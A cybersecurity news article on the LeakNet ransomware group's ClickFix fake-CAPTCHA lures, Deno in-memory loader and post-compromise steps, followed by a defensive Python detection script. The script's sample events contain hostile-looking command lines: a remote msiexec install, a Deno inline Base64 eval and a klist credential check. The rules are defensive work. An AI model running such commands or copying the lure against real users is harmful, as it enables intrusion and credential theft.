
The ransomware campaign known as LeakNet employed ClickFix social engineering tactics delivered through compromised websites as its initial access method.
ClickFix tricks users into manually running malicious commands to resolve non-existent errors. Its use is a departure from traditional initial access methods, such as buying stolen credentials from an initial access broker (IAB), ReliaQuest said in a technical report published today.
The second key aspect of these attacks is the use of a staged command-and-control (C2) loader built on top of the Deno JavaScript runtime to execute the malicious payload directly in memory.
“The key here is that both entry vectors lead to the same repeatable post-exploitation sequence every time,” the cybersecurity firm said. “This gives defenders the ability to be specific: Regardless of how LeakNet enters, it is a known behavior that can be detected and stopped at each stage of the ransomware, well before it is deployed.”
LeakNet first emerged in November 2024, calling itself a “digital watchdog” and positioning its activities as focused on internet freedom and transparency. According to data collected by Dragos, the group also targets industrial associations.
Using ClickFix to compromise victims provides several benefits. Most importantly, it reduces dependence on third-party suppliers, reduces acquisition cost per victim, and eliminates the operational bottleneck of waiting for valuable accounts to come to market.
These attacks use legitimate but compromised sites that present a fake CAPTCHA verification check, which instructs users to copy an “msiexec.exe” command and paste it into the Windows Run dialog. The attacks are not limited to any particular industry but cast a wide net to infect as many victims as possible.
This development comes as more threat actors adopt the ClickFix playbook. This playbook exploits trusted, everyday workflows to lure users into executing malicious commands through legitimate Windows tools in a seemingly routine and safe manner.
“LeakNet’s adoption of ClickFix represents the first documented expansion of the group’s early access capabilities as well as a meaningful strategic shift,” ReliaQuest said.

“By moving away from the IAB, LeakNet removes dependencies that naturally limit its rapid and widespread operation. Also, because ClickFix is delivered through a legitimate (but compromised) website, it does not present the same obvious signals at the network layer as attacker-owned infrastructure.”
In addition to using ClickFix to initiate the attack chain, LeakNet is credited with using a Deno-based loader to execute Base64-encoded JavaScript directly in memory to minimize on-disk evidence and avoid detection. This payload is designed to fingerprint a compromised system, connect to an external server to retrieve the next stage of malware, and enter into a polling loop that repeatedly retrieves and executes additional code via Deno.
Separately, ReliaQuest said it also observed intrusion attempts in which threat actors used Microsoft Teams-based phishing to socially engineer users into launching payload chains that ultimately spawned similar Deno-based loaders. Although the origin of this activity remains unknown, the use of a BYOR (Bring Your Own Runtime) approach suggests either an expansion of LeakNet’s initial access vectors or adoption of the technique by other threat actors.
LeakNet’s post-compromise activity follows a consistent methodology: it begins with DLL sideloading to launch a malicious DLL delivered by the loader, followed by lateral movement, data exfiltration, and encryption using PsExec.
“LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on a compromised system. This allows attackers to act faster and more cautiously by knowing which accounts and services are already accessible without requiring new credentials,” ReliaQuest said.
“For staging and exfiltration, LeakNet uses S3 buckets and leverages the appearance of regular cloud traffic to reduce the discovery footprint.”
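The repeatable sequence described above (a Run-dialog msiexec.exe launch, a Deno process evaluating inline Base64 script, then cmd.exe /c klist) lends itself to process-creation detection. The following is an added illustration, not ReliaQuest’s own detection logic; the events are constructed, and the field names assume a Sysmon-style process-creation record with parent image, image and command line.

```python
import re
from typing import Callable

# Constructed Sysmon-style process-creation events (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmd": "msiexec.exe /i https://cdn.example.invalid/verify.msi /qn"},
    {"parent": "msiexec.exe", "image": "deno.exe",
     "cmd": "deno.exe eval \"eval(atob('Y29uc29sZS5sb2coMSk='))\""},
    {"parent": "rundll32.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c klist"},
    {"parent": "services.exe", "image": "msiexec.exe",
     "cmd": "msiexec.exe /V"},  # the Windows Installer service itself: benign
]

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def clickfix_msiexec(e: dict) -> bool:
    # Commands pasted into the Run dialog are children of explorer.exe; a remote
    # .msi URL on the msiexec command line is the ClickFix tell.
    return (e["image"].lower() == "msiexec.exe"
            and e["parent"].lower() == "explorer.exe"
            and re.search(r"https?://", e["cmd"], re.I) is not None)

def deno_inline_eval(e: dict) -> bool:
    # Deno evaluating script passed inline, decoded with atob() or carried as a
    # long Base64 run, so nothing is written to disk.
    cmd = e["cmd"]
    return (e["image"].lower() == "deno.exe"
            and " eval " in cmd.lower()
            and ("atob(" in cmd or B64_RUN.search(cmd) is not None))

def klist_discovery(e: dict) -> bool:
    # cmd.exe /c klist: the ticket/credential discovery step the report describes.
    return (e["image"].lower() == "cmd.exe"
            and re.search(r"/c\s+klist\b", e["cmd"], re.I) is not None)

RULES: dict[str, Callable[[dict], bool]] = {
    "clickfix_msiexec_remote_url": clickfix_msiexec,
    "deno_inline_base64_eval": deno_inline_eval,
    "klist_credential_discovery": klist_discovery,
}

def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every event that matches a rule."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['cmd']}")
```

The klist rule alone is noisy in environments where administrators run it routinely; its value comes from correlating it on the same host shortly after the msiexec.exe and Deno hits.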
The development comes after Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most reported victims on data breach sites.
“In one-third of incidents, the first access path was a known or suspected exploit of a vulnerability, mostly in a common VPN or firewall,” Google Threat Intelligence Group (GTIG) said, adding that 77% of ransomware intrusions analyzed involved suspected data theft, up from 57% in 2024.
“Despite the continued disruption caused by adversary conflict and disruption, ransomware attackers remain highly motivated and the extortion ecosystem shows continued resilience. However, several indicators suggest that the overall profitability of these activities is declining, and that at least some threat actors are shifting their targeting calculations away from large enterprises and instead focusing on high-volume attacks against small organizations.”
